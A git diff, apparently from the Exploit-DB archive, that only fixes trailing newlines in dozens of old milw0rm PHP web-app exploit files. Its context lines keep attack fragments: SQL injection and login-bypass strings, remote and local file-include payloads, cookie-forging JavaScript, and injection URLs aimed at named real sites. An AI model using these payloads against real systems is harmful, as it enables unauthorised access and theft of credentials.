bcd36601c..50b0ac96b 100755 --- a/platforms/php/webapps/7844.py +++ b/platforms/php/webapps/7844.py @@ -43,4 +43,4 @@ else: test=test+1; print "\n\n\t\t\t[ coded by Pouya_Server ]" -# milw0rm.com [2009-01-21] +# milw0rm.com [2009-01-21] \ No newline at end of file diff --git a/platforms/php/webapps/7846.php b/platforms/php/webapps/7846.php index d1e5dcea3..904379a3e 100755 --- a/platforms/php/webapps/7846.php +++ b/platforms/php/webapps/7846.php @@ -65,4 +65,4 @@ for ($j = 1; $j <= 49; $j++) { } ?> -# milw0rm.com [2009-01-21] +# milw0rm.com [2009-01-21] \ No newline at end of file diff --git a/platforms/php/webapps/7847.txt b/platforms/php/webapps/7847.txt index 987062d4b..d8d2a5d07 100755 --- a/platforms/php/webapps/7847.txt +++ b/platforms/php/webapps/7847.txt @@ -10,4 +10,4 @@ Xss : http://[site]/?option=com_beamospetition&func=sign&pet='> -# milw0rm.com [2009-02-05] +# milw0rm.com [2009-02-05] \ No newline at end of file diff --git a/platforms/php/webapps/7998.txt b/platforms/php/webapps/7998.txt index 354ddb616..8a07f39a5 100755 --- a/platforms/php/webapps/7998.txt +++ b/platforms/php/webapps/7998.txt @@ -37,4 +37,4 @@ Onun derdini gordum, derdime iMRENDiM... FilistiN ---------- -# milw0rm.com [2009-02-06] +# milw0rm.com [2009-02-06] \ No newline at end of file diff --git a/platforms/php/webapps/7999.pl b/platforms/php/webapps/7999.pl index a7a7941ba..4ed39b9ba 100755 --- a/platforms/php/webapps/7999.pl +++ b/platforms/php/webapps/7999.pl @@ -193,4 +193,4 @@ sub help() { exit(0); } -# milw0rm.com [2009-02-06] +# milw0rm.com [2009-02-06] \ No newline at end of file diff --git a/platforms/php/webapps/800.txt b/platforms/php/webapps/800.txt index 445ef9254..a7f99ae1b 100755 --- a/platforms/php/webapps/800.txt +++ b/platforms/php/webapps/800.txt @@ -29,4 +29,4 @@ on google */index.php?module=PostWrap&page= ext:php have fun ".,-*-,._ -.,-*-,." ".,-*-,._.,-*-,._.,-*-,._.,-*-,._.,-*-,._.,-*-,._.,-*-,._.,-*-,._.,-*-,.-.,-*-,." -# milw0rm.com [2005-02-08] +# milw0rm.com [2005-02-08] \ No newline at end of file diff --git a/platforms/php/webapps/8000.txt b/platforms/php/webapps/8000.txt index aa0b17a88..58f530827 100755 --- a/platforms/php/webapps/8000.txt +++ b/platforms/php/webapps/8000.txt @@ -144,4 +144,4 @@ include "$dir/category_main.php"; poc: /include/print_category.php?setup[use_category]=1&dir=data:;base64,PD9waHBpbmZvKCk7Lyo= -# milw0rm.com [2009-02-06] +# milw0rm.com [2009-02-06] \ No newline at end of file diff --git a/platforms/php/webapps/8001.txt b/platforms/php/webapps/8001.txt index 5fb772b5b..27ea11766 100755 --- a/platforms/php/webapps/8001.txt +++ b/platforms/php/webapps/8001.txt @@ -78,4 +78,4 @@ include("outbox/".$load.".txt"); ############################################################################################# -# milw0rm.com [2009-02-06] +# milw0rm.com [2009-02-06] \ No newline at end of file diff --git a/platforms/php/webapps/8002.txt b/platforms/php/webapps/8002.txt index a77da229c..1cab79305 100755 --- a/platforms/php/webapps/8002.txt +++ b/platforms/php/webapps/8002.txt @@ -38,4 +38,4 @@ -=-=-=-= SuNHouSe2@yahoo.com =-=-=- -# milw0rm.com [2009-02-06] +# milw0rm.com [2009-02-06] \ No newline at end of file diff --git a/platforms/php/webapps/8003.pl b/platforms/php/webapps/8003.pl index ce36dfc61..a709e7dfd 100755 --- a/platforms/php/webapps/8003.pl +++ b/platforms/php/webapps/8003.pl @@ -101,4 +101,4 @@ while (){ # __h0__ -# milw0rm.com [2009-02-06] +# milw0rm.com [2009-02-06] \ No newline at end of file diff --git a/platforms/php/webapps/8004.txt b/platforms/php/webapps/8004.txt index 543781823..c0141b505 100755 --- a/platforms/php/webapps/8004.txt +++ b/platforms/php/webapps/8004.txt @@ -59,4 +59,4 @@ put: x0r'; echo 'lol --> /data.inc.php ######################################################################################## -# milw0rm.com [2009-02-06] +# milw0rm.com [2009-02-06] \ No newline at end of file diff --git a/platforms/php/webapps/8005.txt b/platforms/php/webapps/8005.txt index 0786060fd..344f5ee2d 100755 --- a/platforms/php/webapps/8005.txt +++ b/platforms/php/webapps/8005.txt @@ -17,4 +17,4 @@ RFI: http://victim.com/phpyabs/moduli/libri/index.php?Azione=[SHELL] -# milw0rm.com [2009-02-06] +# milw0rm.com [2009-02-06] \ No newline at end of file diff --git a/platforms/php/webapps/8006.txt b/platforms/php/webapps/8006.txt index a70fcfaec..76c1f2399 100755 --- a/platforms/php/webapps/8006.txt +++ b/platforms/php/webapps/8006.txt @@ -22,4 +22,4 @@ exploit : upload your php file as the file name.php.gif or the file name . thanks for www.iq-ty.com hussain x , fahd , montela88 , virus t , abu salaman , MR-MOH , SAKAB , and all of my iq-ty friends =========================================================== -# milw0rm.com [2009-02-09] +# milw0rm.com [2009-02-09] \ No newline at end of file diff --git a/platforms/php/webapps/8007.php b/platforms/php/webapps/8007.php index 47738982a..c69286453 100755 --- a/platforms/php/webapps/8007.php +++ b/platforms/php/webapps/8007.php @@ -72,4 +72,4 @@ while ($chr < strlen ($key)) echo "\n\n"; ?> -# milw0rm.com [2009-02-09] +# milw0rm.com [2009-02-09] \ No newline at end of file diff --git a/platforms/php/webapps/8009.pl b/platforms/php/webapps/8009.pl index d81b3dcc9..b253c66d5 100755 --- a/platforms/php/webapps/8009.pl +++ b/platforms/php/webapps/8009.pl @@ -409,4 +409,4 @@ sub use_gallery_bug } } -# milw0rm.com [2009-02-09] +# milw0rm.com [2009-02-09] \ No newline at end of file diff --git a/platforms/php/webapps/801.c b/platforms/php/webapps/801.c index c9cc228b9..345c618f2 100755 --- a/platforms/php/webapps/801.c +++ b/platforms/php/webapps/801.c @@ -157,4 +157,4 @@ exit(1); } -// milw0rm.com [2005-02-09] +// milw0rm.com [2005-02-09] \ No newline at end of file diff --git a/platforms/php/webapps/8011.txt b/platforms/php/webapps/8011.txt index 2d6cea76c..ac4c26540 100755 --- a/platforms/php/webapps/8011.txt +++ b/platforms/php/webapps/8011.txt @@ -91,4 +91,4 @@ Homepage: http://www.e-rdc.org/ -------------------------------- [ EOF ] ---------------------------------- -# milw0rm.com [2009-02-09] +# milw0rm.com [2009-02-09] \ No newline at end of file diff --git a/platforms/php/webapps/8012.txt b/platforms/php/webapps/8012.txt index dc017e2ea..e832fc580 100755 --- a/platforms/php/webapps/8012.txt +++ b/platforms/php/webapps/8012.txt @@ -10,4 +10,4 @@ www.ontarioabandonedplaces.com/ipguardian/gallery/view.asp?entry=-1+union+select BackDoordan Sevgilerle Thanks All Cyber-Warrior User : ) BackDoor Cyber-Warrior.Org - Akıncılar - Lojistik -# milw0rm.com [2009-02-09] +# milw0rm.com [2009-02-09] \ No newline at end of file diff --git a/platforms/php/webapps/8014.pl b/platforms/php/webapps/8014.pl index 7216f162c..0fac798cb 100755 --- a/platforms/php/webapps/8014.pl +++ b/platforms/php/webapps/8014.pl @@ -77,4 +77,4 @@ while (1) close ($sock); } -# milw0rm.com [2009-02-09] +# milw0rm.com [2009-02-09] \ No newline at end of file diff --git a/platforms/php/webapps/8015.pl b/platforms/php/webapps/8015.pl index e91456f27..4153d529d 100755 --- a/platforms/php/webapps/8015.pl +++ b/platforms/php/webapps/8015.pl @@ -58,4 +58,4 @@ while (1) print $req->decoded_content; } -# milw0rm.com [2009-02-09] +# milw0rm.com [2009-02-09] \ No newline at end of file diff --git a/platforms/php/webapps/8016.txt b/platforms/php/webapps/8016.txt index 588808453..5aae42fcf 100755 --- a/platforms/php/webapps/8016.txt +++ b/platforms/php/webapps/8016.txt @@ -36,4 +36,4 @@ Contact With Me I Will Declear All This Fucking Functions # bEST wISHES -# milw0rm.com [2009-02-09] +# milw0rm.com [2009-02-09] \ No newline at end of file diff --git a/platforms/php/webapps/8017.txt b/platforms/php/webapps/8017.txt index 3b7807e64..7b85006b7 100755 --- a/platforms/php/webapps/8017.txt +++ b/platforms/php/webapps/8017.txt @@ -36,4 +36,4 @@ Contact With Me I Will Declear All This Fucking Functions # bEST wISHES -# milw0rm.com [2009-02-09] +# milw0rm.com [2009-02-09] \ No newline at end of file diff --git a/platforms/php/webapps/8018.txt b/platforms/php/webapps/8018.txt index f314d5ecf..a43d07860 100755 --- a/platforms/php/webapps/8018.txt +++ b/platforms/php/webapps/8018.txt @@ -20,4 +20,4 @@ http://target.com/flexadmin/ Greetz, agonx, kollek, cardingnu -# milw0rm.com [2009-02-09] +# milw0rm.com [2009-02-09] \ No newline at end of file diff --git a/platforms/php/webapps/8019.txt b/platforms/php/webapps/8019.txt index 90fca87f9..25891ee4b 100755 --- a/platforms/php/webapps/8019.txt +++ b/platforms/php/webapps/8019.txt @@ -94,4 +94,4 @@ Download : http://www.zeroboard.com poc: -# milw0rm.com [2009-02-09] +# milw0rm.com [2009-02-09] \ No newline at end of file diff --git a/platforms/php/webapps/8020.txt b/platforms/php/webapps/8020.txt index 29b3f57c4..43d180b0f 100755 --- a/platforms/php/webapps/8020.txt +++ b/platforms/php/webapps/8020.txt @@ -35,4 +35,4 @@ Vuln example: check_lang.php?lang=../[localinclude]%00 -# milw0rm.com [2009-02-09] +# milw0rm.com [2009-02-09] \ No newline at end of file diff --git a/platforms/php/webapps/8025.txt b/platforms/php/webapps/8025.txt index 731c7953f..3ac8ca3a4 100755 --- a/platforms/php/webapps/8025.txt +++ b/platforms/php/webapps/8025.txt @@ -52,4 +52,4 @@ Author: ahmadbady [kivi_hacker666@yahoo.com] from[iran] --------------------------------------------------- -# milw0rm.com [2009-02-09] +# milw0rm.com [2009-02-09] \ No newline at end of file diff --git a/platforms/php/webapps/8026.txt b/platforms/php/webapps/8026.txt index 4b1e46cfa..bad1bea19 100755 --- a/platforms/php/webapps/8026.txt +++ b/platforms/php/webapps/8026.txt @@ -28,4 +28,4 @@ Author: ahmadbady [kivi_hacker666@yahoo.com] from[iran] --------------------------------------------------- -# milw0rm.com [2009-02-09] +# milw0rm.com [2009-02-09] \ No newline at end of file diff --git a/platforms/php/webapps/8027.txt b/platforms/php/webapps/8027.txt index 0b79d2146..de5c1eeec 100755 --- a/platforms/php/webapps/8027.txt +++ b/platforms/php/webapps/8027.txt @@ -31,4 +31,4 @@ ###The 20 years old, german Hacker bd0rk### -# milw0rm.com [2009-02-09] +# milw0rm.com [2009-02-09] \ No newline at end of file diff --git a/platforms/php/webapps/8028.pl b/platforms/php/webapps/8028.pl index f4329692d..83af7aaed 100755 --- a/platforms/php/webapps/8028.pl +++ b/platforms/php/webapps/8028.pl @@ -215,4 +215,4 @@ sub help() { exit(0); } -# milw0rm.com [2009-02-09] +# milw0rm.com [2009-02-09] \ No newline at end of file diff --git a/platforms/php/webapps/8029.txt b/platforms/php/webapps/8029.txt index ef15ff8dc..b08cba505 100755 --- a/platforms/php/webapps/8029.txt +++ b/platforms/php/webapps/8029.txt @@ -33,4 +33,4 @@ if register_globals Off, then ---------------------------------------------------------------------------------------- (c) cheverok, 10.2.2009 greetz to antichat -# milw0rm.com [2009-02-10] +# milw0rm.com [2009-02-10] \ No newline at end of file diff --git a/platforms/php/webapps/8030.txt b/platforms/php/webapps/8030.txt index 8a5a09f4f..8614419b4 100755 --- a/platforms/php/webapps/8030.txt +++ b/platforms/php/webapps/8030.txt @@ -25,4 +25,4 @@ File]%00 ######################################################################################################### -# milw0rm.com [2009-02-10] +# milw0rm.com [2009-02-10] \ No newline at end of file diff --git a/platforms/php/webapps/8031.pph b/platforms/php/webapps/8031.pph index be783f662..4ff3eb1ee 100755 --- a/platforms/php/webapps/8031.pph +++ b/platforms/php/webapps/8031.pph @@ -106,4 +106,4 @@ sub get() { ############################################################################ -# milw0rm.com [2009-02-10] +# milw0rm.com [2009-02-10] \ No newline at end of file diff --git a/platforms/php/webapps/8032.txt b/platforms/php/webapps/8032.txt index 83c334757..ac8e28589 100755 --- a/platforms/php/webapps/8032.txt +++ b/platforms/php/webapps/8032.txt @@ -36,4 +36,4 @@ Exploit: javascript:document.cookie = ######################################################################################## -# milw0rm.com [2009-02-10] +# milw0rm.com [2009-02-10] \ No newline at end of file diff --git a/platforms/php/webapps/8033.txt b/platforms/php/webapps/8033.txt index 55489becd..f8bd3e1cc 100755 --- a/platforms/php/webapps/8033.txt +++ b/platforms/php/webapps/8033.txt @@ -32,4 +32,4 @@ Exploit: ' or '1=1 ######################################################################################## -# milw0rm.com [2009-02-10] +# milw0rm.com [2009-02-10] \ No newline at end of file diff --git a/platforms/php/webapps/8034.txt b/platforms/php/webapps/8034.txt index 527a27b0d..e1592230c 100755 --- a/platforms/php/webapps/8034.txt +++ b/platforms/php/webapps/8034.txt @@ -39,4 +39,4 @@ Exploit: ' or '1=1 ######################################################################################## -# milw0rm.com [2009-02-10] +# milw0rm.com [2009-02-10] \ No newline at end of file diff --git a/platforms/php/webapps/8035.txt b/platforms/php/webapps/8035.txt index a1ce81c97..94dd04143 100755 --- a/platforms/php/webapps/8035.txt +++ b/platforms/php/webapps/8035.txt @@ -34,4 +34,4 @@ Exploit: ' or '1=1 ######################################################################################## -# milw0rm.com [2009-02-10] +# milw0rm.com [2009-02-10] \ No newline at end of file diff --git a/platforms/php/webapps/8036.pl b/platforms/php/webapps/8036.pl index bba0df206..51577b310 100755 --- a/platforms/php/webapps/8036.pl +++ b/platforms/php/webapps/8036.pl @@ -254,4 +254,4 @@ sub help() { exit(0); } -# milw0rm.com [2009-02-10] +# milw0rm.com [2009-02-10] \ No newline at end of file diff --git a/platforms/php/webapps/8038.py b/platforms/php/webapps/8038.py index 878717fb4..43043ee98 100755 --- a/platforms/php/webapps/8038.py +++ b/platforms/php/webapps/8038.py @@ -71,4 +71,4 @@ def main(): if __name__ == '__main__': main() -# milw0rm.com [2009-02-10] +# milw0rm.com [2009-02-10] \ No newline at end of file diff --git a/platforms/php/webapps/8039.txt b/platforms/php/webapps/8039.txt index 8f52c11df..52ba10342 100755 --- a/platforms/php/webapps/8039.txt +++ b/platforms/php/webapps/8039.txt @@ -42,4 +42,4 @@ dont forget: http://www.skadate.com/demo/$userfiles/tmp/0b3291151174726fefa04cfa [~] [~]---------------------------------------------------------------------- -# milw0rm.com [2009-02-11] +# milw0rm.com [2009-02-11] \ No newline at end of file diff --git a/platforms/php/webapps/8040.txt b/platforms/php/webapps/8040.txt index b51ede5f2..58084692f 100755 --- a/platforms/php/webapps/8040.txt +++ b/platforms/php/webapps/8040.txt @@ -48,4 +48,4 @@ Exploit: 1- javascript:document.cookie ="g_admin=1; path=/" ######################################################################################## -# milw0rm.com [2009-02-11] +# milw0rm.com [2009-02-11] \ No newline at end of file diff --git a/platforms/php/webapps/8042.txt b/platforms/php/webapps/8042.txt index d5fe2f0bf..cc5ac181f 100755 --- a/platforms/php/webapps/8042.txt +++ b/platforms/php/webapps/8042.txt @@ -31,4 +31,4 @@ = =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -# milw0rm.com [2009-02-11] +# milw0rm.com [2009-02-11] \ No newline at end of file diff --git a/platforms/php/webapps/8043.pl b/platforms/php/webapps/8043.pl index 4e54b3dad..88b2ed7f8 100755 --- a/platforms/php/webapps/8043.pl +++ b/platforms/php/webapps/8043.pl @@ -246,4 +246,4 @@ sub help() { exit(0); } -# milw0rm.com [2009-02-11] +# milw0rm.com [2009-02-11] \ No newline at end of file diff --git a/platforms/php/webapps/8044.txt b/platforms/php/webapps/8044.txt index 565fe6ec2..46f200898 100755 --- a/platforms/php/webapps/8044.txt +++ b/platforms/php/webapps/8044.txt @@ -18,4 +18,4 @@ http://www.scriptsden.com/dating/searchmatch.php?page=2&sort_by=username&sort_or #greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r, Whitestar -# milw0rm.com [2009-02-11] +# milw0rm.com [2009-02-11] \ No newline at end of file diff --git a/platforms/php/webapps/8045.pl b/platforms/php/webapps/8045.pl index 7318131a9..944fad042 100755 --- a/platforms/php/webapps/8045.pl +++ b/platforms/php/webapps/8045.pl @@ -246,4 +246,4 @@ sub help() { exit(0); } -# milw0rm.com [2009-02-11] +# milw0rm.com [2009-02-11] \ No newline at end of file diff --git a/platforms/php/webapps/8046.txt b/platforms/php/webapps/8046.txt index 6698bb221..e765d948e 100755 --- a/platforms/php/webapps/8046.txt +++ b/platforms/php/webapps/8046.txt @@ -26,4 +26,4 @@ Exploit: http://victim.it/viewer.php?id=-1 union select ######################################################################################## -# milw0rm.com [2009-02-12] +# milw0rm.com [2009-02-12] \ No newline at end of file diff --git a/platforms/php/webapps/8047.txt b/platforms/php/webapps/8047.txt index 5ea3cf766..24dcab8a1 100755 --- a/platforms/php/webapps/8047.txt +++ b/platforms/php/webapps/8047.txt @@ -24,4 +24,4 @@ P.S:i wholeheartedly celebrate your valentines day and wish you to love, be loved, success and ferrari -# milw0rm.com [2009-02-12] +# milw0rm.com [2009-02-12] \ No newline at end of file diff --git a/platforms/php/webapps/8049.txt b/platforms/php/webapps/8049.txt index 65041587b..0054f355c 100755 --- a/platforms/php/webapps/8049.txt +++ b/platforms/php/webapps/8049.txt @@ -32,4 +32,4 @@ thnx for putting all the vulns up brotha ! I'm finally done with this shit..number 13 and there will be no more I'm outta here.. bye ya'll -# milw0rm.com [2009-02-13] +# milw0rm.com [2009-02-13] \ No newline at end of file diff --git a/platforms/php/webapps/8050.txt b/platforms/php/webapps/8050.txt index d82992623..51fca002a 100755 --- a/platforms/php/webapps/8050.txt +++ b/platforms/php/webapps/8050.txt @@ -27,4 +27,4 @@ Exploit: http://no-exploit.com/forum/page.php?nc=vbvb&id=-1 union select 0,conca Cyber-Zone(Abdelkhalek) ,Hussin X ,leopard ,FrFoRHaCKeR ,ShBh BaGhDaD ,RoMyOoOo members [No-exploit.Com] -# milw0rm.com [2009-02-13] +# milw0rm.com [2009-02-13] \ No newline at end of file diff --git a/platforms/php/webapps/8052.pl b/platforms/php/webapps/8052.pl index f1aa1f803..a558e67f6 100755 --- a/platforms/php/webapps/8052.pl +++ b/platforms/php/webapps/8052.pl @@ -82,4 +82,4 @@ while (){ #bd0rk -# milw0rm.com [2009-02-13] +# milw0rm.com [2009-02-13] \ No newline at end of file diff --git a/platforms/php/webapps/8053.pl b/platforms/php/webapps/8053.pl index 0550725dc..3ba119401 100755 --- a/platforms/php/webapps/8053.pl +++ b/platforms/php/webapps/8053.pl @@ -211,4 +211,4 @@ sub help() { exit(0); } -# milw0rm.com [2009-02-13] +# milw0rm.com [2009-02-13] \ No newline at end of file diff --git a/platforms/php/webapps/8054.pl b/platforms/php/webapps/8054.pl index 0feef5283..bbbe64fef 100755 --- a/platforms/php/webapps/8054.pl +++ b/platforms/php/webapps/8054.pl @@ -235,4 +235,4 @@ sub help() { exit(0); } -# milw0rm.com [2009-02-13] +# milw0rm.com [2009-02-13] \ No newline at end of file diff --git a/platforms/php/webapps/8057.txt b/platforms/php/webapps/8057.txt index f97235244..b6d9c7dd8 100755 --- a/platforms/php/webapps/8057.txt +++ b/platforms/php/webapps/8057.txt @@ -12,4 +12,4 @@ For this Persistent XSS to work you have to: 3. Upload any picture to the photo album you created and put as the description something such as: 4. Now have anyone view your slideshow! -# milw0rm.com [2009-02-16] +# milw0rm.com [2009-02-16] \ No newline at end of file diff --git a/platforms/php/webapps/8060.php b/platforms/php/webapps/8060.php index da245c619..3042920b4 100755 --- a/platforms/php/webapps/8060.php +++ b/platforms/php/webapps/8060.php @@ -92,4 +92,4 @@ while(1) ?> -# milw0rm.com [2009-02-16] +# milw0rm.com [2009-02-16] \ No newline at end of file diff --git a/platforms/php/webapps/8061.pl b/platforms/php/webapps/8061.pl index 8c4c879fa..3c4a872b7 100755 --- a/platforms/php/webapps/8061.pl +++ b/platforms/php/webapps/8061.pl @@ -167,4 +167,4 @@ sub help() { exit(0); } -# milw0rm.com [2009-02-16] +# milw0rm.com [2009-02-16] \ No newline at end of file diff --git a/platforms/php/webapps/8062.txt b/platforms/php/webapps/8062.txt index 26330f2d5..47d699044 100755 --- a/platforms/php/webapps/8062.txt +++ b/platforms/php/webapps/8062.txt @@ -52,4 +52,4 @@ ReSendUser=cekac' union select 0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6# =============================================================================================== -# milw0rm.com [2009-02-16] +# milw0rm.com [2009-02-16] \ No newline at end of file diff --git a/platforms/php/webapps/8063.txt b/platforms/php/webapps/8063.txt index 6d5a69b20..d5e216d95 100755 --- a/platforms/php/webapps/8063.txt +++ b/platforms/php/webapps/8063.txt @@ -65,4 +65,4 @@ Need: attachments allowed =============================================================================================== -# milw0rm.com [2009-02-16] +# milw0rm.com [2009-02-16] \ No newline at end of file diff --git a/platforms/php/webapps/8064.pl b/platforms/php/webapps/8064.pl index eab2f678b..a10115393 100755 --- a/platforms/php/webapps/8064.pl +++ b/platforms/php/webapps/8064.pl @@ -126,4 +126,4 @@ sub cookies return "login_user=$id#$username#$password"; } -# milw0rm.com [2009-02-16] +# milw0rm.com [2009-02-16] \ No newline at end of file diff --git a/platforms/php/webapps/8066.txt b/platforms/php/webapps/8066.txt index a1c166d22..fe49885b4 100755 --- a/platforms/php/webapps/8066.txt +++ b/platforms/php/webapps/8066.txt @@ -38,4 +38,4 @@ Author: ahmadbady [kivi_hacker666@yahoo.com] from[iran] --------------------------------------------------- -# milw0rm.com [2009-02-16] +# milw0rm.com [2009-02-16] \ No newline at end of file diff --git a/platforms/php/webapps/8068.txt b/platforms/php/webapps/8068.txt index 80184d332..6101dc12f 100755 --- a/platforms/php/webapps/8068.txt +++ b/platforms/php/webapps/8068.txt @@ -228,4 +228,4 @@ Personal homepage: http://www.janekvind.com/ ---------------------- [ EOF ] ------------------------------ -# milw0rm.com [2009-02-16] +# milw0rm.com [2009-02-16] \ No newline at end of file diff --git a/platforms/php/webapps/8069.txt b/platforms/php/webapps/8069.txt index 640889319..afe4320df 100755 --- a/platforms/php/webapps/8069.txt +++ b/platforms/php/webapps/8069.txt @@ -51,4 +51,4 @@ And then \admin\index.php ^ ^ Auth Bypassed ^ ^ w00t Z0ne - InfoSec Forums [ w00tZ0ne.org ] -# milw0rm.com [2009-02-16] +# milw0rm.com [2009-02-16] \ No newline at end of file diff --git a/platforms/php/webapps/807.txt b/platforms/php/webapps/807.txt index f86d4520a..200884e46 100755 --- a/platforms/php/webapps/807.txt +++ b/platforms/php/webapps/807.txt @@ -11,4 +11,4 @@ member.php?action=viewpro&member=nonexist' UNION SELECT uid, username, password, /* will show administrator's name and password hash (in the "Yahoo" field). */ -# milw0rm.com [2005-02-10] +# milw0rm.com [2005-02-10] \ No newline at end of file diff --git a/platforms/php/webapps/8071.txt b/platforms/php/webapps/8071.txt index 865d39087..7ef569f7c 100755 --- a/platforms/php/webapps/8071.txt +++ b/platforms/php/webapps/8071.txt @@ -54,4 +54,4 @@ Exploit: 1- javascript:document.cookie = "login=OK; path=/" ######################################################################################## -# milw0rm.com [2009-02-17] +# milw0rm.com [2009-02-17] \ No newline at end of file diff --git a/platforms/php/webapps/8072.txt b/platforms/php/webapps/8072.txt index d4bb719aa..216f29db5 100755 --- a/platforms/php/webapps/8072.txt +++ b/platforms/php/webapps/8072.txt @@ -31,4 +31,4 @@ Exploit: http://victim.org/header.php?mod=' union select 0,0,0,concat(id,char(45),UName,char(45),Paswd),0,0 from Users-- ######################################################################################## -# milw0rm.com [2009-02-17] +# milw0rm.com [2009-02-17] \ No newline at end of file diff --git a/platforms/php/webapps/8073.txt b/platforms/php/webapps/8073.txt index ce6fc9d48..85829ccf3 100755 --- a/platforms/php/webapps/8073.txt +++ b/platforms/php/webapps/8073.txt @@ -18,4 +18,4 @@ Bugged file is /[path]/extra/genbackup.php Exploit: http://victim.org/extra/genbackup.php ######################################################################################## -# milw0rm.com [2009-02-17] +# milw0rm.com [2009-02-17] \ No newline at end of file diff --git a/platforms/php/webapps/8075.pl b/platforms/php/webapps/8075.pl index 09ddbdb96..941449200 100755 --- a/platforms/php/webapps/8075.pl +++ b/platforms/php/webapps/8075.pl @@ -79,4 +79,4 @@ if ($choice == 1 | $choice == 2) { print "\nWanna fight without weapon? No way dude!"; } -# milw0rm.com [2009-02-18] +# milw0rm.com [2009-02-18] \ No newline at end of file diff --git a/platforms/php/webapps/8076.txt b/platforms/php/webapps/8076.txt index a327f1e18..ffb0eb1be 100755 --- a/platforms/php/webapps/8076.txt +++ b/platforms/php/webapps/8076.txt @@ -34,4 +34,4 @@ Exploit: 1- Username: admin ' or ' EOF -# milw0rm.com [2009-02-18] +# milw0rm.com [2009-02-18] \ No newline at end of file diff --git a/platforms/php/webapps/808.txt b/platforms/php/webapps/808.txt index cd47e4146..7fa38b662 100755 --- a/platforms/php/webapps/808.txt +++ b/platforms/php/webapps/808.txt @@ -10,4 +10,4 @@ Log in with username Administrator'/* from admin/index.php page. -# milw0rm.com [2005-02-10] +# milw0rm.com [2005-02-10] \ No newline at end of file diff --git a/platforms/php/webapps/8083.txt b/platforms/php/webapps/8083.txt index 4bc83fb81..0dff43c3b 100755 --- a/platforms/php/webapps/8083.txt +++ b/platforms/php/webapps/8083.txt @@ -72,4 +72,4 @@ if($config['lastrss_ap_enabled']) <-----{ Zapraszam na forum DEVIL TEAM, google:"DEVIL TEAM" lub http://6189.pl, http://devilteam.pl -# milw0rm.com [2009-02-20] +# milw0rm.com [2009-02-20] \ No newline at end of file diff --git a/platforms/php/webapps/8088.txt b/platforms/php/webapps/8088.txt index 4ddef5049..fffbedf95 100755 --- a/platforms/php/webapps/8088.txt +++ b/platforms/php/webapps/8088.txt @@ -16,4 +16,4 @@ http://www.autothieme.de/forum --------------------------------------------------------- ######################################################### -# milw0rm.com [2009-02-20] +# milw0rm.com [2009-02-20] \ No newline at end of file diff --git a/platforms/php/webapps/8089.pl b/platforms/php/webapps/8089.pl index 69065c9aa..4af0b1f9c 100755 --- a/platforms/php/webapps/8089.pl +++ b/platforms/php/webapps/8089.pl @@ -225,4 +225,4 @@ sub help() { exit(0); } -# milw0rm.com [2009-02-20] +# milw0rm.com [2009-02-20] \ No newline at end of file diff --git a/platforms/php/webapps/809.txt b/platforms/php/webapps/809.txt index 9f2dcd044..67ccfbf62 100755 --- a/platforms/php/webapps/809.txt +++ b/platforms/php/webapps/809.txt @@ -10,4 +10,4 @@ at login.php enter user name as Administrator'/* -# milw0rm.com [2005-02-10] +# milw0rm.com [2005-02-10] \ No newline at end of file diff --git a/platforms/php/webapps/8092.txt b/platforms/php/webapps/8092.txt index 017c89ac7..45639ffd1 100755 --- a/platforms/php/webapps/8092.txt +++ b/platforms/php/webapps/8092.txt @@ -21,4 +21,4 @@ dork: intitle:"zFeeder admin panel" Author: ahmadbady [kivi_hacker666@yahoo.com] --------------------------------------------------- -# milw0rm.com [2009-02-23] +# milw0rm.com [2009-02-23] \ No newline at end of file diff --git a/platforms/php/webapps/8093.pl b/platforms/php/webapps/8093.pl index d05753d83..e9c637d2e 100755 --- a/platforms/php/webapps/8093.pl +++ b/platforms/php/webapps/8093.pl @@ -128,4 +128,4 @@ # __h0__ -# milw0rm.com [2009-02-23] +# milw0rm.com [2009-02-23] \ No newline at end of file diff --git a/platforms/php/webapps/8094.pl b/platforms/php/webapps/8094.pl index 6cb52a8e5..ab59dae46 100755 --- a/platforms/php/webapps/8094.pl +++ b/platforms/php/webapps/8094.pl @@ -228,4 +228,4 @@ sub help() { exit(0); } -# milw0rm.com [2009-02-23] +# milw0rm.com [2009-02-23] \ No newline at end of file diff --git a/platforms/php/webapps/8095.pl b/platforms/php/webapps/8095.pl index 17be1e0e0..854eeefbc 100755 --- a/platforms/php/webapps/8095.pl +++ b/platforms/php/webapps/8095.pl @@ -234,4 +234,4 @@ sub help() { exit(0); } -# milw0rm.com [2009-02-23] +# milw0rm.com [2009-02-23] \ No newline at end of file diff --git a/platforms/php/webapps/8098.txt b/platforms/php/webapps/8098.txt index 02c3f012c..7b3ba4d10 100755 --- a/platforms/php/webapps/8098.txt +++ b/platforms/php/webapps/8098.txt @@ -90,4 +90,4 @@ Homepage: http://www.e-rdc.org/ -------------------------------- [ EOF ] ---------------------------------- -# milw0rm.com [2009-02-23] +# milw0rm.com [2009-02-23] \ No newline at end of file diff --git a/platforms/php/webapps/8100.pl b/platforms/php/webapps/8100.pl index a32514b11..20e9a7545 100755 --- a/platforms/php/webapps/8100.pl +++ b/platforms/php/webapps/8100.pl @@ -66,4 +66,4 @@ else } } -# milw0rm.com [2009-02-23] +# milw0rm.com [2009-02-23] \ No newline at end of file diff --git a/platforms/php/webapps/8101.txt b/platforms/php/webapps/8101.txt index f281de0ec..913f99232 100755 --- a/platforms/php/webapps/8101.txt +++ b/platforms/php/webapps/8101.txt @@ -34,4 +34,4 @@ you can inject SQL code in the USER space to bypass the admin login ############################################################################ -# milw0rm.com [2009-02-24] +# milw0rm.com [2009-02-24] \ No newline at end of file diff --git a/platforms/php/webapps/8104.txt b/platforms/php/webapps/8104.txt index 75a5216a3..8ca001325 100755 --- a/platforms/php/webapps/8104.txt +++ b/platforms/php/webapps/8104.txt @@ -13,4 +13,4 @@ CMS PAGE : http://web-sites.kiev.ua GOOGLE DORK : allinurl:index.php?act=publ Greetz: GraBBerZ, Antichat, XN, no respect all Turk =\ -# milw0rm.com [2009-02-24] +# milw0rm.com [2009-02-24] \ No newline at end of file diff --git a/platforms/php/webapps/8105.txt b/platforms/php/webapps/8105.txt index d4ea58ac9..f36fb05aa 100755 --- a/platforms/php/webapps/8105.txt +++ b/platforms/php/webapps/8105.txt @@ -216,4 +216,4 @@ Recommendations: Uninstall pPIM immediately! -# milw0rm.com [2009-02-25] +# 